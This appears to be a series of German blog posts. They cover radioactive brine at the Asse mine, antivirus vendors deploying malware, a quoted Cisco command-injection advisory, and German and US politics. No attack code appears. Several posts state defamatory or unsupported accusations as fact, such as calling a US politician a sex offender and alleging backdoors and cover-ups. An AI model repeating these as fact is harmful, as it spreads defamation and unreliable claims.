Erst der spaßige Teil bzgl. der Strahlung:Der Leser ist aber auch Geophysiker und hat noch ein paar fachliche Dinge anzumerken.Ich hab mal gesucht, was Mineralwasser so hat. Eigentlich wollte ich auch mal "Heilwässer" aus Karlsbad etc berechnen aber da findet man komischerweise keine Daten...
Naja also mal angenommen jemand trinkt 200 Liter von dem Salzwasser im Jahr mit 15k Bq/l dann sind wir bei 3E6 bq.
Die offiziellen Dosiskoeffizienten bekommt man bei der Bundesregierung und für Erwachsene über 17 ist das 1,8E-11 Sv/Bq und damit kommen wir auf rund 54 MicroSievert pro Jahr.
Damit ist nach Bundesamt für Strahlenschutz das Wasser ungefähr so radioaktiv in seiner Wirkung wie Josefsquelle und Rhäzünser.
Wahrscheinlich "bisschen" salziger.Wer Deutschlands beliebtestes Mineralwasser, Gerolsteiner, die Treppen schleppt müsste demnach mind. 2000 Liter davon im Jahr süffeln um äquivalent viel abzubekommen.
"Demnach sei das Salzwasser in einer Tiefe von 700 Metern gefunden worden, also oberhalb der Haupteinlagerungsebenen für Atommüll in 725 und 750 Meter."Das ist Quatsch. In jeder Grundwasserdynamik-Vorlesung, 1. Stunde wird sofort klar, dass "es ist höher also muss von oben" für gespannte Aquifere nicht gilt.
Da gilt harte Geologie und solange die da keine absolut wasserdichte Sperrschicht bei 710 oder so haben(und die haben sie nicht denn hier schwimmt ja ein Salzdom durchs Sediment nach oben, der alles kaputt drückt) sind solche Aussagen schlicht Unsinn.
Ich hab außerdem die Seismik gesehen, von mehreren Salzstöcken. Da ist alles kaputt. Und war es auch immer schon.
Zitat von alten Messtrupps ausm Feld: "Nach den ersten Schüssen hätten wir eigentlich aufhören können"
Und das alles noch vor Geophysikalischer Prozessierung und allem.
In der Geo-Industrie ist das mehr oder weniger ein offenes Geheimnis, bzw. sogar öffentlich.
Wie so ne Seismik dann aussieht und ein Salzstock, der nach oben Schwimmt kannst du dir hier angucken, lohnt sich alleine zum Lernen. [Asse-Bericht der Bundesgesellschaft für Endlagerung].
Seite 76 gibt's ein erstes schönes Bild der Seismik.
Wer mir hier erzählen will dass die Aquifere dicht sind kann bitte weggehen, das sehen auch Amateure, dass das nicht so ist.
Das Modell inklusive interpretierter Risse ist auf Seite 108 mal auszugsweise für EINES der Profile. Nur ein Schnitt.
Das sind also alles nur Schutzbehauptungen, um Verantwortlichkeiten in die Vergangenheit abzuwälzen, denn der Vorbetreiber war ja... Forschungsbergwerk.
Die Herkunft über Isotopenuntersuchungen etc. nachzuweisen würde die BGE angesichts ihrer Finanzen ein Fingerschnipsen kosten aber ich schätze die Details könnten die Bevölkerung beunruhigen.
Wenn du richtig Bock hast Strg+F "Schädigung" im Geotechnischen Monitoring-Bericht.
Mal ganz abgesehen davon sind diese Berichte auch ein Paradebeispiel für den Stand der Digitalisierung in D:
"Wenn wir n PNG ins PDF packen isses doch digital!!!!1111elf"
Eins muss ich den BGElern allerdings lassen: Normalerweise wird sowas absolut und unter gar keinen Umständen öffentlich. Chapeau.
New hotness: Palo Alto gibt zu, ihren Kunden Malware installiert zu haben.
As a means to test an AV/EDR bypass tool, these endpoints had older versions of Cortex XDR agents installed. Unbeknownst to the threat actor, we were able to access these rogue endpoints.We also discovered a series of toolkits and other files belonging to the threat actor on the system, which included the bypass tool. We successfully traced and identified posts related to the sale of this specific tool on cybercrime forums like XSS and Exploit.
Der schlug gerade vor, dass die USA die Nato nicht mehr unterstützen, außer die EU schafft eine Ausnahme für Musk-Twitter in ihrer Regulierungsagenda.
Das ist natürlich ein echter Lacher, denn die USA "unterstützen" ja nicht die Nato sondern die haben das immerwährende Kommando. Nur aus Kunstförderungsgründen betreibt die Nato das Theater, sich einen europäischen "Generalsekretär" zu leisten für die Kameras, der natürlich überhaupt gar nichts zu melden hat innerhalb der Nato.
Trump hingegen ist so abgewrackt, dass er bei seinem (auch schon skandalösen) Telefonat mit Selenskyj vorsichtshalber eine zweite Hirnzelle in Form von Elon Musk mitgebracht hat. Die drei apokalyptischen Reiter.
Die haben erkannt, wer der einzige seriös aussehende Kanzlerkandidat im Moment ist, und müssen ihn angreifen, aber brauchen für ihre Landeskoalitionen plausible deniability.
Und jetzt pinkelt auch noch Elon Musk gegen den Wind in Richtung Habeck.
Freut mich, dass die alle erkannt haben, wer hier der einzige satisfaktionsfähige Kanzlerkandidat ist. Wobei das bei dem Söder auch einfach Rachegelüste sein könnten, dafür wie krass Habeck ihn im Februar öffentlich rundgemacht hat (Achtung: Tiktok-Link mit nerviger Hintergrundmucke).
Update: Ein Leser hat ein Video der Habeck-Söder-Debatte gefunden.
Update: Falschen Videolink korrigiert.
Die Regierung hat anscheinend kapiert, dass wenn die Amis darauf bestehen, TSMC-Fabriken in den USA aufzubauen, dass dann die dann keinen Druck mehr haben, Taiwan im Zweifelsfall gegen die Chinesen zu verteidigen.
Cum-Ex liegt schon über 10 Jahre zurück, die Akten sind also schon vernichtet. Das Bundeswahlgesetz erlaubt ein Abkürzen der Fristen im Falle einer Auflösung des Bundestags.
Update: Bei besonders schwerer Steuerhinterziehung liegt die Verjährungsfrist bei 15 Jahren, nicht bei 10, und würde mit dem Gesetz auf 8 abgekürzt. Diese Theorie ist also noch im Rennen.
Auch dafür gibt es eine schöne Verschwörungstheorie: Die CDU würde in Sachsen gerne mit der AfD koalieren, weil die ja inhaltlich eh einer Meinung sind: Ausländer raus und neoliberale "Wirtschaftspolitik" unter der Annahme ewigen Wachstums. Zusammen hätten die eine 2/3-Mehrheit, aber das würde auf Bundesebene Stimmen kosten.
Der Ministerpräsident in Sachsen muss spätestens bis zum 3. Februar gewählt werden. Also will die CDU die Bundestagswahl vorher durchgezogen haben. (Danke, Lennart)
Bei Verschwörungstheorien beobachte ich immer begeistert, wie jahrelanges Wegleugnen eines Tages spontan umspringt, entweder zu "haben wir doch schon immer gewusst" (hat sich aber nie im Handeln niedergeschlagen und wurde die ganze Zeit nach Kräften geleugnet!), oder, noch schlimmer, zu "haben wir doch schon immer gesagt" (eine glatte Lüge).
Umso erfreulicher für mich in letzter Zeit, wie sich bei Kernthemen von mir langsam herauskristallisiert, dass wir uns diesem Kipppunkt nähern.
Heise-Kommentar: Sophos und der gebrochene Schwur. Was ist der gebrochene Schwur? Dass Sophos Malware an ihre Kunden verteilt hat, um angebliche chinesische Hacker auszuspionieren, die ihre kaputte Sophos-Software genutzt haben, um Sophos-Kunden anzugreifen. Hier mein Kommentar zu der Sophos-Nummer, als die ganz frisch war. Jürgen Schmidt, Chef von Heise Security, dazu:
Sie haben selbst Spionage-Software entwickelt und die gezielt auf Systemen von Kunden platziert, um diese auszuforschen. Das war eigentlich ein ungeschriebenes Gesetz der Branche: Wir entwickeln keine Malware und insbesondere setzen wir sie nicht ein, um unsere Kunden auszuspionieren.Ich würde noch einen Schritt weiter gehen und sagen: Das war schon immer Malware. Gut, ich habe da Einblicke, die vielleicht nicht jeder hat. Ich weiß, wie so "Antiviren" funktionieren, und was für Methoden die verwenden, um Kernel-Calls zu hooken und ihren Code in Prozesse zu injecten. Das ist genau das, was eine Verhaltens-Anomalie-Erkennung sofort als Malware flaggen würde. Daher haben die Antiviren Whitelists drin, um sich nicht gegenseitig zu flaggen, und warnen explizit davor, nur eine "Endpoint Security" zur Zeit zu installieren, und deshalb schaltet Norton erstmal den MS Defender aus. Der würde nämlich alle Alarmglocken zünden, wenn Norton tut, was Norton halt so tut. Norton hier als Stellvertreter für alle Antiviren.
Wenn man das weiß, dann wird spontan klar: Das war schon immer Malware, die sich Rechte rausnimmt, die man im System niemandem zugestehen sollte, schon gar nicht Vertriebsgetriebenen Firmen wie Antivirenherstellern.
Dieses ungeschriebene Gesetz, das Jürgen hier zitiert, das gab es noch nie. Das war schon immer ein Trust Me I Know What I'm Doing, und genau wie bei Wurstproduktion will der Konsument da gar nicht so genau hingucken, weil er weiß: Wenn er wüsste, was da passiert, könnte er das Produkt nicht mehr konsumieren.
Ich für meinen Teil finde auch nicht glaubwürdig, dass Sophos diesen Übersprung dazu, mit krimineller Energie Malware an ihre Kunden auszuliefern und deren Systeme absichtlich weiter zu gefährden, nur in diesem einen Fall gegen die fiesen Chinesen einsetzt. Kriminelle Energie mateiralisiert sich nicht über Nacht. So viel kriminelle Energie muss man über Jahre hegen und pflegen. Nur eine durch und durch unvertrauenswürdige Firma würde auch nur erwägen, solche Methoden einzusetzen.
Überlegt euch auch mal, wie verbogen deren moralischer Kompass sein muss, damit sie das auch noch für eine gute Idee, das öffentlich zuzugeben und sich damit als Helden zu feiern zu versuchen.
Sophos steht hier als Stellvertreter für alle Antiviren. Glaubt mal gar nicht, dass irgendeiner von denen vertrauenswürdig ist.
Hier ist noch ein Kipppunkt-Indikator. Ein anderer Heise-Kommentator pflichtet mir bei, dass es ungefährlicher ist, für Entdecker von Sicherheitslücken, die im Darknet zu verkloppen als sie dem Verursacher zu melden. Ich persönlich habe seit mindestens 20 Jahren keine Sicherheitslücken mehr initiativ-gemeldet oder auch nur gesucht. Ich suche Sicherheitslücken, wenn mich der Hersteller dafür bezahlt. Wenn ich über eine stolpere, melde ich die nur wenn es sich um freie Software handelt. An Bug Bounty-Programmen nehme ich nicht teil.
Die Lobbyisten der Industrie haben die Rahmenbedingungen so gesetzt, dass ich auch allen anderen nur raten kann, es mir gleich zu tun. Anderes aktuelles Beispiel in dem Kontext waren die polnischen Eisenbahnhacker auf dem letzten CCC-Kongress.
Die mussten sich inzwischen vor Gericht einer Klage dieser Firma stellen. Ich bewundere deren Heldenmut, aber hätte ich nicht gemacht. Da wäre ich Trump-Wähler und würde den ganzen Apparat herunterbrennen sehen wollen, bevor ich wieder mitzuhelfen bereit wäre. Dankt CDU und FDP.
Auch da scheint sich inzwischen die Erkenntnis breit zu machen, dass ich die ganze Zeit Recht hatte, und es gibt jetzt den Versuch eines Reförmchens. Ich glaube es, wenn ich es sehe.
Wenn man bedenkt, wie viel billiger und besser wir das alles hätten haben können, wenn die Leute gleich auf mich hören würden. Aber Plan B greift auch: Aus Schmerzen lernen. In diesem Sinne: Geht ihr mal alle in die Cloud und macht Blockchain, IoT und "KI". Wir sehen uns in 10 Jahren wieder und weinen gemeinsam dem verbrannten Geld hinterher.
Der Leser setzt Cum-Ex-Olaf daher in eine Linie mit Netanjahu, Trump und Berlusconi, wenn es darum geht, das Amt auszunutzen, um sich selbst vor Strafverfolgung zu bewahren.
Eine Weile nichts, dann werden Papier und Drucker knapp. (Achtung: Link geht zur "Bild") (Siehe auch) (Danke, Daniel)
Das haben jetzt mal ein paar Wissenschaftler geprüft, anhand der Zahlen von den Jahren 2000 bis 2008 und teilweise noch später. Stellt sich raus: Automatisierung zerstört Karrieren, und zwar nachhaltig.
Früher konnte man ohne Ausbildung irgendwo anfangen, am Job lernen, und hatte dann mit der Zeit Chancen, seine Karriere zu besser bezahlten Jobs aufzuwerten.
Mit der Einführung von Automatisierung hat man diese Aufwärtschance nicht mehr, sondern man kann nur auf andere Jobs ausweichen, die höchstens gleich gut bezahlt sind.
Schlimmer noch: Automatisierung in der Produktion von Branche A hat auch die Karrieren in anderen Branchen zerstört, z.B. örtliche Läden oder Dienstleister. Denn die Leute hatten ja weniger Geld in der Tasche und konnten sich damit weniger Dinge leisten und damit geht dann die gesamte örtliche Wirtschaft ein.
Wenn euch also das nächste Mal jemand erzählt, wenn "KI" Jobs ersetzen, dann sollen die Leute halt andere Jobs machen, dann könnt ihr die weiterhin auslachen, und ab jetzt fundiert.
Oh, und:
"Areas most affected by robotization saw stronger support for populist candidates like Donald Trump in 2016," he noted. "The connection between career uncertainty and political realignment is clear: as people lose faith in their ability to advance economically, they seek alternative political solutions."
Ich bin kein Freund der Grünen, aber das ist die einzige Partei, die überhaupt einen Kandidaten aufstellt!
Das Missverhältnis zwischen den Kandidaten ist so krass, dass ich mir sogar vorzustellen anfange, für die Grünen zu stimmen, weil der Habeck so offensichtlich und mit so einem Abstand der einzige erwähnenswerte Kandidat ist.
Nein, nicht Godzilla. Immerhin.
Atomlager Asse: Bergleute stoßen auf radioaktives SalzwasserMoney Quote:
Die Bundesgesellschaft für Endlagerung (BGE) rätselt über die Herkunft.EIN MYSTERIUM!!1!
Die BGE hatte im Sommer dieses Jahres ungewöhnlich starke Bewegungen im Gestein des früheren Salzbergwerks registriert.Werden wir wohl nie herausfinden.
Tja. Das passiert halt, wenn man CDU oder SPD wählt und die Probleme aussitzen lässt.
Ambulance hits Oregon cyclist, rushes him to hospital, then sticks him with $1,800 bill, lawsuit says
Congratulations, President @realDonaldTrump. Ready to work together as we did for four years. With your convictions and mine. With respect and ambition. For more peace and prosperity.
Spoiler: Da ist ein subtiler Wortwitz drin.
Kamala Harris: 69,109,836 votes (47.7%)
Donald J. Trump: 73,450,164 votes (50.7%)
Joe Biden: 81,284,666 (51.3%)Der Donald hat praktisch genau so viele Stimmen eingefahren. Die Democrats haben hingegen haben über 10 Millionen Stimmen verloren.
Donald J. Trump: 74,224,319 (46.9%)
Die sind einfach nicht zur Wahl gegangen. Und so wie die Democrats sich gerade für ihren "großartigen" Wahlkampf feiern, werden die dann wohl auch nächstes Mal nicht zur Wahl gehen.
Schritt 1: Anerkennen, dass es ein Problem gibt.
A senior official at COP29 climate change conference in Azerbaijan appears to have used his role to arrange a meeting to discuss potential fossil fuel deals, the BBC can report.
Das ist kein Ausreißer.
Ein 54-Jähriger soll als Systemadministrator der Stadt Dresden abertausende Dateien und personenbezogene Daten von 430.000 Bürgern auf privaten Speichergeräten gesichert haben.Hey, vielleicht hatte die Verwaltung nicht genug Geld für den Kauf von Speichermedien und der Mann wollte bloß helfen! (Danke, Hans)
Aktueller Höhepunkt: CDU-Landtagspolitiker wegen Volksverhetzung verurteilt.
Update: Technisch gesehen ist es ein Strafbefehl. Einige Leser schreiben mir jetzt, das sei ja etwas anderes als eine Verurteilung, weil das quasi ein freidrehender Staatsanwalt alleine auslösen kann. Stimmt aber nicht: Der Staatsanwalt kann einen Antrag beim Gericht stellen und das Gericht erlässt dann den Strafbefehl. Wikipedia dazu:
Das Strafbefehlsverfahren ist im deutschen Recht ein vereinfachtes Verfahren zur Bewältigung der leichten Kriminalität durch einen schriftlichen Strafbefehl. Die Besonderheit des Strafbefehlsverfahrens liegt darin, dass es zu einer rechtskräftigen Verurteilung ohne mündliche Hauptverhandlung führen kann. Dies entlastet Gericht, Staatsanwaltschaft, Polizei und andere Behörden (die nicht als Zeugen geladen werden müssen), kann aber auch im Interesse des Beschuldigten liegen, da das Verfahren kostensparend, schnell und ohne Aufsehen erledigt wird.[1] Nach aktuell herrschender Meinung muss die Schuld des Täters dabei nicht zur Überzeugung des Gerichts feststehen, sondern es genügt ein hinreichender Tatverdacht.[2]
Update: Ah, also zu einer Verurteilung wird ein Strafbefehl, wenn man keinen Widerspruch einlegt. Hat er aber.
New hotness: Ransom ohne -ware will in Crypto-Währung bezahlt werden. Gekidnappt hatten die Gangster den Chef einer Crypto-Firma.
Money Quote:
"The safety and security of all of WonderFi's employees are paramount," Skurka said in the email. "Client funds and data remain safe, and were not impacted by this incident."
Keine Sorge! Wir haben das Lösegeld nicht mit Kundeneinlagen bezahlt!1!!
Na was hat Microsoft denn in der Vergangenheit getan in solchen Fällen? Richtig! Sie haben ihre marktbeherrschende Position ausgenutzt und das mit irgendwas anderem in ein Paket gepackt und dann den Einzelkauf des anderen ohne das Paket nicht mehr angeboten!
So auch jetzt. Wenn keiner "Copilot Pro" kaufen will, dann packen wir das halt in das MS 362-Abo rein und machen das entsprechend teurer!1!!
Leider kann die EU da nichts machen, weil sie sich selber völlig unnötig komplett abhängig gemacht haben von Microsofts Produkten. Kein Produkt so schlecht, dass es nicht mit Steuergeldern gekauft würde.
Jetzt ist der perfekte Moment, um unbeobachtet einen Wirecard-belasteten Goldman-Sachs-Fuzzy zum Finanzminister zu machen.
Wer weiß, was die gerade noch so unter dem Radar durchzufliegen versuchen.
Ich weiß ja nicht, wie ihr das seht, aber ich habe 28 Days Later gesehen. Ich weiß, wie das weitergeht.
Wobei ...
The company works with monkeys to carry out clinical trials, including on brain disease disorder treatments, and says it has "one of the largest and most comprehensive nonhuman primate facilities, designed specifically for monkeys, in the United States."
Vielleicht doch eher Braindead als 28 Days Later.Update: Oder es könnte auch 12 Monkeys werden?
It took Heimdal a while to trace the problem. According to a post on Reddit: "Due to the limited initial footprint, identifying the root cause took some time. By 18:05 UTC, we traced the issue to the Windows Update API, where Microsoft had mistakenly labeled the Windows Server 2025 upgrade as KB5044284."
Ist schon toll, wie Microsoft mit Convenience-Funktionen den armen überarbeiteten Admins die Arbeit leichter macht. Und auch betriebswirtschaftlich ist das geschickt. Wieso warten, bis die Leute freiwillig die neue Version kaufen?Wie, ihr dachtet doch nicht, dass da keine Lizenzzahlungen fällig werden, oder?
Wo andere Leute für Terrorismus bestraft würden, werden Microsoft-Kunden halt ihre Backup-Strategie live testen und dann völlig unbeirrt weiter Geld nach Redmond werfen. Wenn sie nicht eh schon in die Cloud gezogen sind, weil da ist sowas ja dann jemand anders Problem!1!!
Update: Auf der anderen Seite ist Microsoft hier geradezu eine humanitäre Organisation. Sie haben die Schmerzen in der Welt gesehen und sich gedacht: Die Leute brauchen dringend eine Ablenkung. (Danke, Henning)
Ein Leserbrief dazu:
Ich wollt mal wissen, ob Scholz mehr Geld bekommt, wenn er bis nächstes Jahr wartet.IANAL, aber scheinbar ja.
Pension für Kanzler und Minister nennt sich Ruhegehalt, geregelt in §15 Bundesministergesetz.
"Das Ruhegehalt beträgt nach Vollendung einer Amtszeit von vier Jahren 27,74 vom Hundert des Amtsgehalts und des Ortszuschlags. Es steigt mit jedem weiteren Amtsjahr um 2,39167 vom Hundert bis zum Höchstsatz von 71,75 vom Hundert."
Scholz ist laut Wikipedia seit dem 14.03.2018 Teil der Regierung. Wie ich es verstehe ist es dem Gesetz egal in welcher Rolle.
Damit bekäme er bei Amtsverlust nach dem 14.03.2025 2,4% mehr Geld. Entsprechend wäre ich sehr verwundert, wenn er vorher das Amt ablegt.
Update: Ein anderer Leser widerspricht.
dein Leserbrief ist in der Hinsicht leider gleich doppelt falsch:
1.) Wären es 2,4 Prozentpunkte mehr Gehalt nicht 2,4% mehr Gehalt. Wenn der Ausgangspunkt 27,74 Prozentpunkte sind, sind 2,4 Prozentpunkte 8,7% mehr Gehalt. Oder entsprechend noch mehr wenn man für 3,x Jahre von weniger als 27,74 Prozentpunkte ausgeht.
2.) Klickt man auf den mitgelieferten Link steht da:
"Bei einer Beendigung des Amtsverhältnisses aus den in § 9 Abs. 1 Nr. 1 und 3 genannten Gründen oder im Falle einer Auflösung des Bundestages und einer ununterbrochenen Zugehörigkeit zur Bundesregierung von mehr als zwei Jahren gilt dies als Amtszeit von vier Jahren."§ 9 Abs 1 sagt:
"(1) Das Amtsverhältnis der Mitglieder der Bundesregierung endet
1. mit der Entlassung des Bundeskanzlers, wenn der Bundestag ihm nach Artikel 67 des Grundgesetzes das Mißtrauen ausgesprochen hat,
2. mit dem Zusammentritt eines neuen Bundestages,
3. mit jeder anderen Erledigung des Amtes des Bundeskanzlers."tl;dr Scholz krieg so oder so seine 4 Jahre Gehalt.
Update: Es gibt noch die Theorie, dass im März in Hamburg die Bürgerschaftswahlen anstehen, und sich die SPD einen Push erhofft, wenn es da gut für sie läuft.
Vom Cum-Ex-Kanzler mit Porschepleitier-Minister über Cum-Ex-Kanzler mit Goldman-Sachs-Minister zum Blackrock-Kanzler. Mal sehen, wie der den Goldman-Sachs-Minister noch toppen wird.
Hey, sie könnten noch Tönnies in die Lebensmittelregulierung holen!
Cisco hat mal wieder eine Bugdoor in einem ihrer versifften Management-Interfaces.
A vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points could allow an unauthenticated, remote attacker to perform command injection attacks with root privileges on the underlying operating system.
Jawohl, meine Damen und Herren. Ein Webserver, der als root läuft, und vor der Authentisierung keine Eingabevalidierung macht.Im Jahre 2024.
Das schafft nur ein wirklich marktführender Konzern, der jahrzehntelang gezielt nicht in kompetentes Personal investiert. Oder ein Konzern, der von der NSA eingeflüstert kriegt, wo er die Backdoors platzieren soll.
Das kann nur ein Konzern machen, dessen Schrott-Produkte trotzdem immer wieder Idioten kaufen. In einem funktionierenden Markt wäre der Laden eine Ruine, von Heuschrecken gekauft, ausgeblutet und vor die Wand gefahren. (Danke, Micha)
Update: Der Postillon hat die Erklärung:
"Ist langjährige Tradition des Amtes": Verkehrsminister Wissing erklärt, warum er nicht zurücktritt
Jörg Kukies (*21.02.1968 in in Mainz) (SPD), war jahrelang in führenden Positionen der globalen Investmentbank Goldman Sachs, zuletzt als Deutschlandchef, tätig.Da kannst du eigentlich schon aufhören. Aber lest weiter!
2018 wechselte er unter Finanzminister Olaf Scholz (SPD) an die Spitze des Bundesfinanzministeriums. Dort war er zuständig für den Bereich der Banken- und Finanzmarktregulierung, auch die seines bisherigen Arbeitgebers.Jawohl, meine Damen und Herren. Das nennt man Regulatory Capture und es ist eine der wichtigsten Formen von Korruption und Staatsversagen.
Update: Wikipedia hat auch noch ein paar "Qualifikationen".
Laut einem Spiegel-Bericht drängte er zwei Tage vor der Wirecard-Insolvenz in einem Telefonat den KfW IPEX-Bank-Chef Klaus R. Michalak, Wirecard einen neuen Kredit zu gewähren.
Passt wie Arsch auf Eimer!
Äh, und nun? Jetzt wird Merz Kanzler oder wie? Weil das glaubt der ja wohl selber nicht, dass er bei Neuwahlen eine Chance hat.
Boah als wenn heute noch nicht genug kaputtgegangen wäre!
Update: Whoa, wir haben ja einen ... Kanzler! Und er hat eine Rede gehalten! Die Rede seines Lebens, würde ich sagen.
Ich fragte mich gar: Wer ist dieser Typ da im Fernsehen und was haben sie mit dem Scholz gemacht?!
Oder müssen erst noch ein paar Länder an die Faschisten fallen?
Drei? Gestern waren es noch zwei!
Die Schlachterei Tönnies steht im Verdacht, ohne Kennzeichnung Brei aus Schlachtabfällen in seine Wurst zu mischen. Jetzt soll die gleichnamige Unternehmensgruppe einen neuen Namen bekommen.Welchen Namen? Premium Food Group!
*wieher*
Das ist die Foundation. Firefox wird von der Mozilla Corporation gemacht.
Endlich tut mal jemand was gegen die amerikanische Hegemonie!
Jetzt wird hoffentlich auch der letzte Kloppi verstehen, wieso man seine Daten nicht in einer amerikanischen Cloud ablegt!
Die Frage ist, ob die Ukraine die Ressourcen für ein Atomprogramm hat. Vielleicht haben die noch ein paar strategische Akten aus der Sowjetzeit aufgehoben?
Aber Polen z.B. wäre auch zuzutrauen, dass sie eine Versicherung gegen einen Einmarsch der Russen haben wollen, und nicht der Nato beim Zerbröseln zugucken wollen.
Fehlerdiagnose:
„Der Antrag beziehungsweise der daraus resultierende Zugangsbrief ist durch einen technischen Fehler, ausgelöst durch die zeitgleiche Zeitumstellung quasi in eine „Zeitschleife“ geraten.“Klar, hört man ja immer wieder. Wer von uns ist noch nicht in eine Zeitschleife geraten bei der Zeitumstellung?!
Softwarefehler. Kann man nichts machen.
Auch fehlt mir gerade der jugendliche Optimismus von 2016, dass es vielleicht doch nicht so schlimm wird.
Es gibt da eine Menge wirklich unangenehmer Gedanken gerade. Vance ist ein Triebtäter, wie es damals Pence war.
Aber wie ist es mit der Aussicht für Europa? Die Ukraine ist dann ja wohl Toast, wenn ihr größter Beschützer wegfällt. Aber ich stelle mir gerade vor, wie Putin sich die Hände reibt, und sagt: Der Job in Amerika ist fertig. Da müssen wir nicht mehr destabilisieren. Jetzt kann unsere Destabilisierungsmaschine sich ganz Europa widmen!
Amerika ist natürlich auch Toast. Mit Impfgegner RFK als Gesundheitsminister und Elon "Vorschlaghammer" Musk als "Entbürokratisierer" ist schon abzusehen, wie das weitergehen wird.
Diese Wahl hat noch eine Sache ein für alle Mal klar gemacht: Die Wähler wollten Trump. Die haben Trump nicht trotz seiner Schwächen gewählt sondern wegen seiner Schwächen. Auch Argumente wie Abtreibung und Marijuana sind nicht einfach per se mehrheitsfähig. Die Leute wollten das und wir sollten daher auch kein Mitleid mit denen haben. Ist wie bei Brexit damals.
Update: Für die Palästinenser ist das natürlich auch eher apokalyptisch. Trump hatte Netanjahu gesagt, er solle halt tun, was er tun muss. Carte Blanche für den Gazastreifen. Vermutlich wird das die Palis in Europa befeuern, noch mehr Infrastruktur kaputtzumachen, und auch ihre letzten Freunde zu verlieren. Die Politik der Harris war auch schon katastrophal für die Palis.
Hoffentlich wird Berlin jetzt nicht von einer Kulturkampf-Einhörner-Flüchtlingswelle aus Kalifornien überrannt. Ich hörte, dass die schlaueren Einhörner alle nach Neuseeland flüchten, und hier in Berlin eher die nicht so schlauen rauskommen werden.
Update: Wenn ihr es noch nicht getan habt, solltet ihr jetzt noch schnell den Greg-Palast-Film über Georgia gucken. In der besten Demokratie, die man für Geld kaufen kann, haben sich die Milliardäre das Ergebnis gekauft, das sie haben wollten.
French outlet La Lettre A had reported that Netflix's French operation was structured until 2021 so that all subscribers signed up with a Dutch subsidiary -- thereby "minimising its tax bill".That left it paying less than one million euros ($1.1 million at today's rates) in taxes to Paris across 2019 and 2020, when it had around seven million French subscribers.
Na kein Wunder, dass die Franzosen mit der Gesamtsituation unzufrieden sind.
Im Original-Pacman-Spiel flieht jeder Geist in eine der vier Ecken der Karte. Ms Pacman haben sie aus Kostengründen nicht komplett neu entwickelt sondern das ist dasselbe Mainboard sogar mit denselben ROMs aber sie patchen dann ein paar Bytes in den ROMs, und diese Patches haben sie verkackt.
Das Highlight von dem Video ist aber nicht das Video selbst sondern der oberste Kommentar. Da ist einer der Entwickler gekommen und bestätigt die Darstellung in dem Video und schreibt dann:
Ok that is seriously depressing. A bug report for work we did in November 1981, 43 years ago.
Hier ist die Bio von dem Typ. (Danke, Kurt)
People shouldn't be afraid of their governments. Governments should be afraid of their people.
Gut, bis auf den einen oder anderen bedauerlichen Einzelfall.
Sie nannten sich "Sächsische Separatisten" und hegten Umsturzpläne: Am Dienstag haben Ermittler eine rechtsextremistische Gruppierung zerschlagen und acht junge Männer festnehmen lassen. [...]Es sind immer die, von denen man es am wenigsten vermutet hätte!1!!Wie der Generalbundesanwalt mitteilte, werden die Beschuldigten dringend verdächtigt, einer inländischen terroristischen Vereinigung anzugehören. [...]
Nach Information des MDR ist unter den Festgenommenen auch der AfD-Stadtrat Kurt Hättasch aus Grimma.
Hey Fefe, wieso sagst du Einzelfälle? Das war doch nur einer? Weil die Meldung noch weitergeht.
Der ebenfalls festgenommene Kevin R. engagiert sich ebenso für die AfD in der Kommunalpolitik, vertritt Hättasch etwa bei Sitzungen des Beirates für Kultur, Jugend und Sport des Stadtradts in Grimma.Nicht doch die AfD! Das waren doch immer lupenreine Demokraten!1!!
Ein Glück, dass unsere Nachrichten nicht so manipulativ sind wie anderswo, nicht wahr?
Die Bundespolizei hat bei Grenzkontrollen in Aachen einen ungewöhnlichen Fund gemacht: Ein 60-Jähriger transportierte auf einem Anhänger eine Artillerie-Kanone.Der Nanny State belästigt schon wieder harmlose Sportschützen!1!! (Danke, Holger)
Es geht da um Wahlmanipulation in Georgia aber auch um die Kontinuität mit Ku-Klux-Klan-Ära Vorgehensweisen.
Nun, Schweden hat gerade Pläne für 13 Windparks in der Ostsee gestoppt.
Begründung:
Decision comes after military concludes projects would complicate defending Nato’s newest member against attackFucking Hell.
Kann aber eigentlich nur nach hinten losgehen, denn die meisten Serien schinden ja am Anfang schon minutenlang Zeit mit überflüssigen Rückblicken. Außerdem werden Streaming-Serien ja über die Anzahl der geguckten Minuten verkauft. Wenn ich einfach vorskippen und den Recap gucken kann, geht das ja runter.
Da hat glaube ich die eine Hand nicht mit der anderen Hand geredet bei Amazon.
Völlig klar also: Da werden wir jetzt investieren! Das Angebot ausweiten!
Ein paar Jahre weiter so und wir erreichen am Ende noch unsere CO2-Ziele im Verkehr!!1!
Höhere Kosten für Personal und Fahrzeuge belasten die Nahverkehrsbranche. Nun überlegen mehrere Länder, ob sie deshalb künftig weniger Züge fahren lassen, obwohl die Nachfrage steigt.Das ist so absurd, dass es sogar der CDU (!!!) auffällt.
»Die Abbestellungen – auch wenn es nur Randzeiten und weniger als 1,5 Prozent aller Verbindungen im Land betrifft – bleiben schmerzhaft und sind sicher nicht das Signal, das wir senden wollen«, teilte Landesverkehrsminister Claus Ruhe Madsen (CDU) im August mit.Das muss eine Krise erst mal schaffen, nicht von der CDU, die es verkackt hat, geleugnet zu werden.
Mehr Nachfrage also wird das Angebot ausgedünnt, hmm? Das muss diese unsichtbare Hand des Marktes sein, von der man immer so viel hört!1!! (Danke, Peter)
Da fällt mir dieser Thread ein…Mit anderen Worten: An der Korruption von Politik und Justiz ist die Automobilindustrie schuld. Hey, macht deren Schuldmaß auch nicht mehr fett, nachdem sie an der Zerstörung der Biosphäre Schuld sind.Was mir dabei besonders gefällt: „Ausgeleierte“ Schlüssel passen praktisch überall. Offensichtlich haben die Autobauer daran gedacht, dass die Leute ja 20 Jahre lang mit ihrem Schlüssel in ihr Auto reinwollen, und dafür gesorgt, dass aus den Schlüsseln durch Verschleiß am Ende ein Dietrich wird, weil der Failure-Mode, den der Hersteller vermeiden will, nicht etwa Diebstahl ist (da verkauft man ein neues Fahrzeug!), sondern das Austauschen des Schließzylinders.
